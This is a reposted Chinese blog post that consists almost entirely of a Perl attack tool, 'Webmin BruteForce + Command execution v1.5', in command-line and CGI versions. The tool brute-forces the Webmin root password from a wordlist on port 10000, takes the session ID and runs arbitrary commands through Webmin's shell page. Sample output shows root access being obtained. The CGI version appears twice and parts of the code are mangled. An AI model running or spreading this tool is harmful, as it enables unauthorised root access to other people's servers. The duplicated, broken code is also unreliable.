Webmin 暴力破解+ 执行命令(转)[@more@]Webmin是一个广泛使用的,运行在linux/unix下,用浏览器来管理系统的工具。用它,你不必知道复杂的命令行,也不用了解各种复杂的配置文件,系统管理变得非常简单!可以设置帐号,配置DNS和文件共享等. Webmin BruteForce + Command execution v1.5 #!/usr/bin/perl ################################################################################ # Webmin BruteForce + Command execution # v1.0:By Di42lo -
_2@012.net.il">
DiAblo_2@012.net.il # v1.5:By ZzagorR -
zzagorrzzagorr@hotmail.com -
www.rootbinbash.com ################################################################################ #add script: #1.wordlist func. #2.log (line:41) ################################################################################ # usage: # ./webmin1.pl #./webmin1.pl 192.168.0.5 "uptime" wordlist.txt # [+] BruteForcing... # [+] trying to enter with: admim # [+] trying to enter with: admin # [+] Found SID : f3231ff32849fa0c8c98487ba8c09dbb # [+] Password : admin # [+] Connecting to host once again # [+] Connected.. Sending Buffer # [+] Buffer sent...running command uptime # root logged into Webmin 1.170 on linux (SuSE Linux 9.1) # 10:55pm up 23 days 9:03, 1 user, load average: 0.20, 0.05, 0.01 ################################################################################ use IO::Socket; if (@ARGV<3){ print "Webmin BruteForcer v1.5 "; print "usage: "; print " webmin15.pl "; print "example: "; print " webmin15.pl
www.abcd.com "id" wordlist.txt "; exit; } my $host=$ARGV[0]; my $cmd=$ARGV[1]; my $wlist=$ARGV[2]; open (data, "$wlist"); @wordlist=; close data; $passx=@wordlist; open(results , ">$host.log"); print results "############################# "; print results "Webmin BruteForce + Command execution v1.5 "; print results "Host:$host "; print results "############################# "; my $chk=0; my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 10); if(!$sock){ print "[-] Webmin on this host does not exist "; print results "[-] Webmin on this host does not exist "; exit; }else{ $sock->close; print "[+] BruteForcing... "; } my $sid; $n=0; while ($chk!=1) { $n++; if($n>$passx){ exit; } $pass=@wordlist[$passx-$n]; my $pass_line="page=%2F&user=root&pass=$pass"; my $buffer="POST /session_login.cgi HTTP/1.0 ". "Host: $host:10000 ". "Keep-Alive: 300 ". "Connection: keep-alive ". "Referer:
http://$host:10000/ ". "Cookie: testing=1 ". "Content-Type: application/x-www-form-urlencoded ". "Content-Length: __ ". " ". $pass_line." "; my $line_size=length($pass_line); $buffer=~s/__/$line_size/g; my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 10); if ($sock){ print "[+] trying to enter with: $pass "; print $sock $buffer; while ($answer=){ if ($answer=~/sid=(.*);/g){ $chk=1; $sid=$1; print "[+] Found SID : $sid "; print "[+] Password : $pass "; print results "[+]:Password:$pass Sid:$sid "; } } } $sock->close; print results "[-]$pass "; } print "[+] Connecting to host once again "; $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 10); if(!$sock){ print "[-] Cant Connect once again for command execution "; print results "[-] Cant Connect once again for command execution "; } print "[+] Connected.. Sending Buffer "; my $temp="-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="cmd" ". " ". "$cmd ". "-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="pwd" ". " ". "/root ". "-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="history" ". " ". " ". "-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="previous" ". " ". "$cmd ". "-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="pcmd" ". " ". "$cmd ". "-----------------------------19777347561180971495777867604-- "; my $buffer_size=length($temp); $buffer="POST /shell/index.cgi HTTP/1.1 ". "Host: $host:10000 ". "Keep-Alive: 300 ". "Connection: keep-alive ". "Referer:
http://$host:10000/shell/ ". "Cookie: sid=$sid; testing=1; x ". "Content-Type: multipart/form-data; boundary=---------------------------19777347561180971495777867604 ". "Content-Length: siz ". " ". $temp; $buffer=~s/siz/$buffer_size/g; print $sock $buffer; if ($sock){ print "[+] Buffer sent...running command $cmd "; print $sock $buffer; while ($answer=){ if ($answer=~/defaultStatus="(.*)";/g) { print $1." ";} if ($answer=~/
Webmin BruteForce + Command execution- cgi version
v1.0:By Di42lo - _2@012.net.ilDiAblo_2@012.net.il
v1.5:By ZzagorR - zzagorrzzagorr@hotmail.com - www.rootbinbash.com
~; if($atak eq "webmin") { open (data, "$wlist"); @wordlist=; close data; $passx=@wordlist; $chk=0; $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 25) || die "[-] Webmin on this host does not exist "; $sock->close; print "[+] BruteForcing...
"; $sid; $n=0; while ($chk!=1) { $n++; if($n>$passx){ exit; } $pass=@wordlist[$passx-$n]; $pass_line="page=%2F&user=root&pass=$pass"; $buffer="POST /session_login.cgi HTTP/1.0 ". "Host: $host:10000 ". "Keep-Alive: 300 ". "Connection: keep-alive ". "Referer: http://$host:10000/ ". "Cookie: testing=1 ". "Content-Type: application/x-www-form-urlencoded ". "Content-Length: __ ". " ". $pass_line." "; $line_size=length($pass_line); $buffer=~s/__/$line_size/g; $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 25); if ($sock){ print "[+] Denenen sifre: $pass
"; print $sock $buffer; while ($answer=){ if ($answer=~/sid=(.*);/g){ $chk=1; $sid=$1; print "[+] Found SID : $sid
"; print "[+] Sifre : $pass
"; } } } $sock->close; } print "[+] Connecting to host once again
"; $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 10) || die "[-] Cant Connect once again for command execution "; print "[+] Connected.. Sending Buffer
"; $temp="-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="cmd" ". " ". "$cmd ". "-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="pwd" ". " ". "/root ". "-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="history" ". " ". " ". "-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="previous" ". " ". "$cmd ". "-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="pcmd" ". " ". "$cmd ". "-----------------------------19777347561180971495777867604-- "; $buffer_size=length($temp); $buffer="POST /shell/index.cgi HTTP/1.1 ". "Host: $host:10000 ". "Keep-Alive: 300 ". "Connection: keep-alive ". "Referer: http://$host:10000/shell/ ". "Cookie: sid=$sid; testing=1; x ". "Content-Type: multipart/form-data; boundary=---------------------------19777347561180971495777867604 ". "Content-Length: siz ". " ". $temp; $buffer=~s/siz/$buffer_size/g; print $sock $buffer; if ($sock){ print "[+] Buffer sent...running command $cmd
"; print $sock $buffer; while ($answer=){ if ($answer=~/defaultStatus="(.*)";/g) { print $1."
";} if ($answer=~/
>/g){
$cmd_chk=1;
}
if ($cmd_chk==1) {
if ($answer=~//g){ exit; } else { print $answer; print results "[+]$answer "; } } } } #!/usr/bin/perl use CGI qw(:standard); use IO::Socket; $CGI::HEADERS_ONCE = 1; $CGI = new CGI; $atak = $CGI->param("atak"); $host = $CGI->param("host"); $wlist = $CGI->param("wlist"); $cmd = $CGI->param("cmd"); print $CGI->header(-type=>'text/html',-charset=>'windows-1254'); print qq~ Webmin Web Brute Force v1.5 - cgi versiyon
Webmin BruteForce + Command execution- cgi version
v1.0:By Di42lo - _2@012.net.ilDiAblo_2@012.net.il
v1.5:By ZzagorR - zzagorrzzagorr@hotmail.com - www.rootbinbash.com
~; if($atak eq "webmin") { open (data, "$wlist"); @wordlist=; close data; $passx=@wordlist; $chk=0; $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 25) || die "[-] Webmin on this host does not exist "; $sock->close; print "[+] BruteForcing...
"; $sid; $n=0; while ($chk!=1) { $n++; if($n>$passx){ exit; } $pass=@wordlist[$passx-$n]; $pass_line="page=%2F&user=root&pass=$pass"; $buffer="POST /session_login.cgi HTTP/1.0 ". "Host: $host:10000 ". "Keep-Alive: 300 ". "Connection: keep-alive ". "Referer: http://$host:10000/ ". "Cookie: testing=1 ". "Content-Type: application/x-www-form-urlencoded ". "Content-Length: __ ". " ". $pass_line." "; $line_size=length($pass_line); $buffer=~s/__/$line_size/g; $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 25); if ($sock){ print "[+] Denenen sifre: $pass
"; print $sock $buffer; while ($answer=){ if ($answer=~/sid=(.*);/g){ $chk=1; $sid=$1; print "[+] Found SID : $sid
"; print "[+] Sifre : $pass
"; } } } $sock->close; } print "[+] Connecting to host once again
"; $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 10) || die "[-] Cant Connect once again for command execution "; print "[+] Connected.. Sending Buffer
"; $temp="-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="cmd" ". " ". "$cmd ". "-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="pwd" ". " ". "/root ". "-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="history" ". " ". " ". "-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="previous" ". " ". "$cmd ". "-----------------------------19777347561180971495777867604 ". "Content-Disposition: form-data; name="pcmd" ". " ". "$cmd ". "-----------------------------19777347561180971495777867604-- "; $buffer_size=length($temp); $buffer="POST /shell/index.cgi HTTP/1.1 ". "Host: $host:10000 ". "Keep-Alive: 300 ". "Connection: keep-alive ". "Referer: http://$host:10000/shell/ ". "Cookie: sid=$sid; testing=1; x ". "Content-Type: multipart/form-data; boundary=---------------------------19777347561180971495777867604 ". "Content-Length: siz ". " ". $temp; $buffer=~s/siz/$buffer_size/g; print $sock $buffer; if ($sock){ print "[+] Buffer sent...running command $cmd
"; print $sock $buffer; while ($answer=){ if ($answer=~/defaultStatus="(.*)";/g) { print $1."
";} if ($answer=~/
>/g){
$cmd_chk=1;
}
if ($cmd_chk==1) {
if ($answer=~//g){ exit; } else { print $answer; } } } } } if($atak eq ""){ print qq~
| Webmin Web Brute Force v1.5 - cgi version 来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/10617542/viewspace-949065/,如需转载,请注明出处,否则将追究法律责任。
下一篇:
纠正14条查杀电脑病毒的错误认识(转)
请登录后发表评论
登录
全部评论
<%=items[i].createtime%>
<%=items[i].content%> <%if(items[i].items.items.length) { %>
<%for(var j=0;j
<%}%> <%}%>
<%=items[i].items.items[j].createtime%>
回复
<%=items[i].items.items[j].username%> 回复 <%=items[i].items.items[j].tousername%>: <%=items[i].items.items[j].content%>
还有<%=items[i].items.total-5%>条评论
) data-count=1 data-flag=true>点击查看
<%}%>
北京盛拓优讯信息技术有限公司. 版权所有 京ICP备09055130号-4 北京市公安局海淀分局网监中心备案编号:11010802021510 广播电视节目制作经营许可证(京) 字第1234号 中国互联网协会会员 |
转载于:http://blog.itpub.net/10617542/viewspace-949065/
扫一扫
4113
到【灌水乐园】发言
